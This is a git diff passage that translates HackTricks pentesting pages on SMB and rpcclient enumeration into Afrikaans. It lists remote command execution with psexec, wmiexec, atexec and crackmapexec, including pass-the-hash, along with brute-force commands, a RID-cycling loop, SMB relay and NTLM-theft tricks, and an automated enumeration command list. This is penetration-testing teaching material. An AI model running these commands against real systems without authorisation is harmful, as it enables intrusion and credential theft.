+| **Instelling**              | **Beskrywing**                                                     |
 | --------------------------- | ------------------------------------------------------------------- |
-| `browseable = yes`          | Allow listing available shares in the current share?                |
-| `read only = no`            | Forbid the creation and modification of files?                      |
-| `writable = yes`            | Allow users to create and modify files?                             |
-| `guest ok = yes`            | Allow connecting to the service without using a password?           |
-| `enable privileges = yes`   | Honor privileges assigned to specific SID?                          |
-| `create mask = 0777`        | What permissions must be assigned to the newly created files?       |
-| `directory mask = 0777`     | What permissions must be assigned to the newly created directories? |
-| `logon script = script.sh`  | What script needs to be executed on the user's login?               |
-| `magic script = script.sh`  | Which script should be executed when the script gets closed?        |
-| `magic output = script.out` | Where the output of the magic script needs to be stored?            |
+| `browseable = yes`          | Toelaat om beskikbare gedeeltes in die huidige gedeelte te lys?     |
+| `read only = no`            | Verbied die skep en wysiging van lêers?                            |
+| `writable = yes`            | Laat gebruikers toe om lêers te skep en wysig?                     |
+| `guest ok = yes`            | Toelaat om na die diens te verbind sonder om 'n wagwoord te gebruik? |
+| `enable privileges = yes`   | Eer voorregte wat aan spesifieke SID toegewys is?                  |
+| `create mask = 0777`        | Watter regte moet aan die nuut geskepte lêers toegewys word?        |
+| `directory mask = 0777`     | Watter regte moet aan die nuut geskepte gidektores toegewys word?   |
+| `logon script = script.sh`  | Watter skrip moet uitgevoer word wanneer die gebruiker aanmeld?     |
+| `magic script = script.sh`  | Watter skrip moet uitgevoer word wanneer die skrip gesluit word?    |
+| `magic output = script.out` | Waar moet die uitset van die toor skrip gestoor word?              |
 
-The command `smbstatus` gives information about the **server** and about **who is connected**.
+Die opdrag `smbstatus` gee inligting oor die **bediener** en oor **wie gekoppel is**.
 
-## Authenticate using Kerberos
-
-You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**:
+## Verifieer met behulp van Kerberos
 
+Jy kan **verifieer** na **kerberos** deur die hulpmiddels **smbclient** en **rpcclient** te gebruik:
 ```bash
 smbclient --kerberos //ws01win10.domain.com/C$
 rpcclient -k ws01win10.domain.com
 ```
-
-## **Execute Commands**
+## **Voer Opdragte Uit**
 
 ### **crackmapexec**
 
-crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:
-
+crackmapexec kan opdragte uitvoer deur enige van die volgende metodes te **misbruik**: **mmcexec, smbexec, atexec, wmiexec**, waarvan **wmiexec** die **verstek** metode is. Jy kan aandui watter opsie jy verkies om te gebruik met die parameter `--exec-method`:
 ```bash
 apt-get install crackmapexec
 
@@ -441,13 +448,11 @@ crackmapexec smb  -d  -u Administrator -p 'password' --rid-brute #RI
 
 crackmapexec smb  -d  -u Administrator -H  #Pass-The-Hash
 ```
-
 ### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
 
-Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
-**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
-In **kali** it is located on /usr/share/doc/python3-impacket/examples/
-
+Albei opsies sal 'n nuwe diens skep (deur gebruik te maak van _\pipe\svcctl_ via SMB) op die slagoffer se masjien en dit gebruik om iets uit te voer (psexec sal 'n uitvoerbare lêer na die ADMIN$ deel oplaai en smbexec sal verwys na cmd.exe/powershell.exe en die payload in die argumente plaas --file-less tegniek-).\
+**Meer inligting** oor [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) en [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
+In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/
 ```bash
 #If no password is provided, it will be prompted
 ./psexec.py [[domain/]username[:password]@]
@@ -455,164 +460,153 @@ In **kali** it is located on /usr/share/doc/python3-impacket/examples/
 psexec \\192.168.122.66 -u Administrator -p 123456Ww
 psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
 ```
-
-Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
+Met behulp van die **parameter** `-k` kan jy teen **kerberos** geverifieer word in plaas van **NTLM**.
 
 ### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
 
-Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
-In **kali** it is located on /usr/share/doc/python3-impacket/examples/
-
+Voer stiekem 'n opdragvenster uit sonder om die skyf aan te raak of 'n nuwe diens te laat loop deur gebruik te maak van DCOM via **poort 135**.\
+In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/
 ```bash
 #If no password is provided, it will be prompted
 ./wmiexec.py [[domain/]username[:password]@] #Prompt for password
 ./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
 #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
 ```
-
-Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
-
+Deur die **parameter** `-k` te gebruik, kan jy geverifieer word teen **kerberos** in plaas van **NTLM**.
 ```bash
 #If no password is provided, it will be prompted
 ./dcomexec.py [[domain/]username[:password]@]
 ./dcomexec.py -hashes  administrator@10.10.10.103 #Pass-the-Hash
 #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
 ```
-
 ### [AtExec](../windows-hardening/ntlm/atexec.md)
 
-Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
-In **kali** it is located on /usr/share/doc/python3-impacket/examples/
-
+Voer opdragte uit via die Taakbeplanner (deur gebruik te maak van _\pipe\atsvc_ via SMB).\
+In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/
 ```bash
 ./atexec.py [[domain/]username[:password]@] "command"
 ./atexec.py -hashes  administrator@10.10.10.175 "whoami"
 ```
-
-## Impacket reference
+## Impacket verwysing
 
 [https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
 
-## **Bruteforce users credentials**
-
-**This is not recommended, you could block an account if you exceed the maximum allowed tries**
+## **Bruteforce gebruikerslegitimasie**
 
+**Dit word nie aanbeveel nie, jy kan 'n rekening blokkeer as jy die maksimum toegelate pogings oorskry**
 ```bash
 nmap --script smb-brute -p 445 
 ridenum.py  500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
 ```
+## SMB-relay aanval
 
-## SMB relay attack
+Hierdie aanval maak gebruik van die Responder toolkit om SMB-outentiseringsessies op 'n interne netwerk vas te vang en dit na 'n teikermasjien te stuur. As die outentiseringsessie suksesvol is, sal dit jou outomaties in 'n stelsel-skulp laat val.\
+[**Meer inligting oor hierdie aanval hier.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
 
-This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
-[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
+## SMB-Valstrik
 
-## SMB-Trap
+Die Windows-biblioteek URLMon.dll probeer outomaties outentiseer na die gasheer wanneer 'n bladsy probeer om toegang tot sekere inhoud te verkry via SMB, byvoorbeeld: `img src="\\10.10.10.10\path\image.jpg"`
 
-The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`
-
-This happens with the functions:
+Dit gebeur met die funksies:
 
 * URLDownloadToFile
 * URLDownloadToCache
 * URLOpenStream
 * URLOpenBlockingStream
 
-Which are used by some browsers and tools (like Skype)
+Wat deur sommige webblaaier en gereedskap (soos Skype) gebruik word.
 
-![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
+![Van: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
 
-### SMBTrap using MitMf
+### SMB-Valstrik met behulp van MitMf
 
-![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
+![Van: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
 
-## NTLM Theft
+## NTLM-diefstal
 
-Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack).
+Soortgelyk aan SMB-valstrik, kan die plant van skadelike lêers op 'n teikersisteem (via SMB, byvoorbeeld) 'n SMB-outentiseringspoging uitlok, wat die NetNTLMv2-hash toelaat om onderskep te word met 'n hulpmiddel soos Responder. Die hash kan dan offline gekraak word of gebruik word in 'n [SMB-relay aanval](pentesting-smb.md#smb-relay-attack).
 
-[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
-
-## HackTricks Automatic Commands
+[Sien: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
 
+## HackTricks Outomatiese Opdragte
 ```
 Protocol_Name: SMB    #Protocol Abbreviation if there is one.
 Port_Number:  137,138,139     #Comma separated if there is more than one.
 Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out
 
 Entry_1:
-  Name: Notes
-  Description: Notes for SMB
-  Note: |
-    While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
+Name: Notes
+Description: Notes for SMB
+Note: |
+While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
 
-    #These are the commands I run in order every time I see an open SMB port
+#These are the commands I run in order every time I see an open SMB port
 
-    With No Creds
-    nbtscan {IP}
-    smbmap -H {IP}
-    smbmap -H {IP} -u null -p null
-    smbmap -H {IP} -u guest
-    smbclient -N -L //{IP}
-    smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
-    rpcclient {IP}
-    rpcclient -U "" {IP}
-    crackmapexec smb {IP}
-    crackmapexec smb {IP} --pass-pol -u "" -p ""
-    crackmapexec smb {IP} --pass-pol -u "guest" -p ""
-    GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
-    GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
-    GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
-    getArch.py -target {IP}
+With No Creds
+nbtscan {IP}
+smbmap -H {IP}
+smbmap -H {IP} -u null -p null
+smbmap -H {IP} -u guest
+smbclient -N -L //{IP}
+smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
+rpcclient {IP}
+rpcclient -U "" {IP}
+crackmapexec smb {IP}
+crackmapexec smb {IP} --pass-pol -u "" -p ""
+crackmapexec smb {IP} --pass-pol -u "guest" -p ""
+GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
+GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
+GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
+getArch.py -target {IP}
 
-    With Creds
-    smbmap -H {IP} -u {Username} -p {Password}
-    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
-    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
-    crackmapexec smb {IP} -u {Username} -p {Password} --shares
-    GetADUsers.py {Domain_Name}/{Username}:{Password} -all
-    GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
-    GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
+With Creds
+smbmap -H {IP} -u {Username} -p {Password}
+smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
+smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
+crackmapexec smb {IP} -u {Username} -p {Password} --shares
+GetADUsers.py {Domain_Name}/{Username}:{Password} -all
+GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
+GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
 
-    https://book.hacktricks.xyz/pentesting/pentesting-smb
+https://book.hacktricks.xyz/pentesting/pentesting-smb
 
 Entry_2:
-  Name: Enum4Linux
-  Description: General SMB Scan
-  Command: enum4linux -a {IP}
+Name: Enum4Linux
+Description: General SMB Scan
+Command: enum4linux -a {IP}
 
 Entry_3:
-  Name: Nmap SMB Scan 1
-  Description: SMB Vuln Scan With Nmap
-  Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
+Name: Nmap SMB Scan 1
+Description: SMB Vuln Scan With Nmap
+Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
 
 Entry_4:
-  Name: Nmap Smb Scan 2
-  Description: SMB Vuln Scan With Nmap (Less Specific)
-  Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
+Name: Nmap Smb Scan 2
+Description: SMB Vuln Scan With Nmap (Less Specific)
+Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
 
 Entry_5:
-  Name: Hydra Brute Force
-  Description: Need User
-  Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
-  
-Entry_6:
-  Name: SMB/SMB2 139/445 consolesless mfs enumeration
-  Description: SMB/SMB2 139/445  enumeration without the need to run msfconsole
-  Note: sourced from https://github.com/carlospolop/legion
-  Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit' 
-    
-```
+Name: Hydra Brute Force
+Description: Need User
+Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
 
+Entry_6:
+Name: SMB/SMB2 139/445 consolesless mfs enumeration
+Description: SMB/SMB2 139/445  enumeration without the need to run msfconsole
+Note: sourced from https://github.com/carlospolop/legion
+Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
+
+```
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
index 2ac735b55..a705a7749 100644
--- a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
+++ b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
@@ -1,125 +1,123 @@
-# rpcclient enumeration
+# rpcclient opsporing
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
 

 
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
+Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
 
 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 
 ***
 
-### **What is a RID**
+### **Wat is 'n RID**
 
-### Overview of Relative Identifiers (RID) and Security Identifiers (SID)
+### Oorsig van Relatiewe Identifiseerders (RID) en Sekuriteitsidentifiseerders (SID)
 
-**Relative Identifiers (RID)** and **Security Identifiers (SID)** are key components in Windows operating systems for uniquely identifying and managing objects, such as users and groups, within a network domain. 
+**Relatiewe Identifiseerders (RID)** en **Sekuriteitsidentifiseerders (SID)** is sleutelkomponente in Windows-bedryfstelsels om unieke identifikasie en bestuur van voorwerpe, soos gebruikers en groepe, binne 'n netwerkdomein te verseker.
 
-- **SIDs** serve as unique identifiers for domains, ensuring that each domain is distinguishable.
-- **RIDs** are appended to SIDs to create unique identifiers for objects within those domains. This combination allows for precise tracking and management of object permissions and access controls.
+- **SIDs** dien as unieke identifiseerders vir domeine, wat verseker dat elke domein onderskeibaar is.
+- **RIDs** word by SIDs gevoeg om unieke identifiseerders vir voorwerpe binne daardie domeine te skep. Hierdie kombinasie maak noukeurige opsporing en bestuur van voorwerppermisies en toegangskontroles moontlik.
 
-For instance, a user named `pepe` might have a unique identifier combining the domain's SID with his specific RID, represented in both hexadecimal (`0x457`) and decimal (`1111`) formats. This results in a complete and unique identifier for pepe within the domain like: `S-1-5-21-1074507654-1937615267-42093643874-1111`.
+Byvoorbeeld, 'n gebruiker genaamd `pepe` kan 'n unieke identifiseerder hê wat die domein se SID met sy spesifieke RID kombineer, verteenwoordig in beide heksadesimale (`0x457`) en desimale (`1111`) formate. Dit lei tot 'n volledige en unieke identifiseerder vir pepe binne die domein soos: `S-1-5-21-1074507654-1937615267-42093643874-1111`.
 
 
-### **Enumeration with rpcclient**
+### **Opsporing met rpcclient**
 
-The **`rpcclient`** utility from Samba is utilized for interacting with **RPC endpoints through named pipes**. Below commands that can be issued to the SAMR, LSARPC, and LSARPC-DS interfaces after a **SMB session is established**, often necessitating credentials.
+Die **`rpcclient`** nut van Samba word gebruik om met **RPC-eindpunte deur middel van genoemde pype** te kommunikeer. Hieronder is opdragte wat uitgereik kan word na die SAMR, LSARPC en LSARPC-DS koppelvlakke nadat 'n **SMB-sessie opgestel** is, wat dikwels legitimasie vereis.
 
-#### Server Information
+#### Bedienerinligting
 
-* To obtain **Server Information**: `srvinfo` command is used.
+* Om **Bedienerinligting te verkry**: word die `srvinfo`-opdrag gebruik.
 
-#### Enumeration of Users
-
-* **Users can be listed** using: `querydispinfo` and `enumdomusers`.
-* **Details of a user** by: `queryuser <0xrid>`.
-* **Groups of a user** with: `queryusergroups <0xrid>`.
-* **A user's SID is retrieved** through: `lookupnames `.
-* **Aliases of users** by: `queryuseraliases [builtin|domain] `.
+#### Opsporing van Gebruikers
 
+* **Gebruikers kan gelys word** deur gebruik te maak van: `querydispinfo` en `enumdomusers`.
+* **Besonderhede van 'n gebruiker** deur: `queryuser <0xrid>`.
+* **Groepe van 'n gebruiker** met: `queryusergroups <0xrid>`.
+* **'n Gebruiker se SID word opgehaal** deur: `lookupnames `.
+* **Aliases van gebruikers** deur: `queryuseraliases [builtin|domain] `.
 ```bash
 # Users' RIDs-forced
 for i in $(seq 500 1100); do
-    rpcclient -N -U "" [IP_ADDRESS] -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
+rpcclient -N -U "" [IP_ADDRESS] -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
 done
 
 # samrdump.py can also serve this purpose
 ```
+#### Opname van Groepe
 
-#### Enumeration of Groups
+* **Groepe** deur: `enumdomgroups`.
+* **Besonderhede van 'n groep** met: `querygroup <0xrid>`.
+* **Lede van 'n groep** deur: `querygroupmem <0xrid>`.
 
-* **Groups** by: `enumdomgroups`.
-* **Details of a group** with: `querygroup <0xrid>`.
-* **Members of a group** through: `querygroupmem <0xrid>`.
+#### Opname van Alias Groepe
 
-#### Enumeration of Alias Groups
+* **Alias groepe** deur: `enumalsgroups `.
+* **Lede van 'n alias groep** met: `queryaliasmem builtin|domain <0xrid>`.
 
-* **Alias groups** by: `enumalsgroups `.
-* **Members of an alias group** with: `queryaliasmem builtin|domain <0xrid>`.
+#### Opname van Domeine
 
-#### Enumeration of Domains
+* **Domeine** deur: `enumdomains`.
+* **'n Domein se SID word opgehaal** deur: `lsaquery`.
+* **Domein inligting word verkry** deur: `querydominfo`.
 
-* **Domains** using: `enumdomains`.
-* **A domain's SID is retrieved** through: `lsaquery`.
-* **Domain information is obtained** by: `querydominfo`.
+#### Opname van Shares
 
-#### Enumeration of Shares
+* **Alle beskikbare shares** deur: `netshareenumall`.
+* **Inligting oor 'n spesifieke share word opgehaal** met: `netsharegetinfo `.
 
-* **All available shares** by: `netshareenumall`.
-* **Information about a specific share is fetched** with: `netsharegetinfo `.
+#### Addisionele Operasies met SIDs
 
-#### Additional Operations with SIDs
+* **SIDs volgens naam** deur: `lookupnames `.
+* **Meer SIDs** deur: `lsaenumsid`.
+* **RID cycling om meer SIDs te kontroleer** word uitgevoer deur: `lookupsids `.
 
-* **SIDs by name** using: `lookupnames `.
-* **More SIDs** through: `lsaenumsid`.
-* **RID cycling to check more SIDs** is performed by: `lookupsids `.
+#### **Ekstra opdragte**
 
-#### **Extra commands**
-
-| **Command**         | **Interface**                                                                                                                                     | **Description**                                                                                                                           |
+| **Opdrag**           | **Interface**                                                                                                                                     | **Beskrywing**                                                                                                                           |
 | ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
-| queryuser           | SAMR                                                                                                                                              | Retrieve user information                                                                                                                 |
-| querygroup          | Retrieve group information                                                                                                                        |                                                                                                                                           |
-| querydominfo        | Retrieve domain information                                                                                                                       |                                                                                                                                           |
-| enumdomusers        | Enumerate domain users                                                                                                                            |                                                                                                                                           |
-| enumdomgroups       | Enumerate domain groups                                                                                                                           |                                                                                                                                           |
-| createdomuser       | Create a domain user                                                                                                                              |                                                                                                                                           |
-| deletedomuser       | Delete a domain user                                                                                                                              |                                                                                                                                           |
-| lookupnames         | LSARPC                                                                                                                                            | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values |
-| lookupsids          | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) |                                                                                                                                           |
-| lsaaddacctrights    | Add rights to a user account                                                                                                                      |                                                                                                                                           |
-| lsaremoveacctrights | Remove rights from a user account                                                                                                                 |                                                                                                                                           |
-| dsroledominfo       | LSARPC-DS                                                                                                                                         | Get primary domain information                                                                                                            |
-| dsenumdomtrusts     | Enumerate trusted domains within an AD forest                                                                                                     |                                                                                                                                           |
+| queryuser           | SAMR                                                                                                                                              | Haal gebruikersinligting op                                                                                                                 |
+| querygroup          | Haal groepinligting op                                                                                                                        |                                                                                                                                           |
+| querydominfo        | Haal domeininligting op                                                                                                                       |                                                                                                                                           |
+| enumdomusers        | Tel domeingebruikers op                                                                                                                       |                                                                                                                                           |
+| enumdomgroups       | Tel domeingroepe op                                                                                                                           |                                                                                                                                           |
+| createdomuser       | Skep 'n domeingebruiker                                                                                                                       |                                                                                                                                           |
+| deletedomuser       | Verwyder 'n domeingebruiker                                                                                                                   |                                                                                                                                           |
+| lookupnames         | LSARPC                                                                                                                                            | Soek gebruikersname na SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) waardes |
+| lookupsids          | Soek SIDs na gebruikersname (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) |                                                                                                                                           |
+| lsaaddacctrights    | Voeg regte by 'n gebruikersrekening                                                                                                            |                                                                                                                                           |
+| lsaremoveacctrights | Verwyder regte van 'n gebruikersrekening                                                                                                       |                                                                                                                                           |
+| dsroledominfo       | LSARPC-DS                                                                                                                                         | Kry primêre domeininligting                                                                                                            |
+| dsenumdomtrusts     | Tel vertroue domeine binne 'n AD-bos                                                                                                           |                                                                                                                                           |
 
-To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](../135-pentesting-msrpc.md).
+Om **beter te verstaan** hoe die gereedskap _**samrdump**_ **en** _**rpcdump**_ werk, moet jy [**Pentesting MSRPC**](../135-pentesting-msrpc.md) lees.
 
 

 
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
+Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder hou jou aanvalsoppervlak dop, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegniese stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
 
 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 
 
 

 
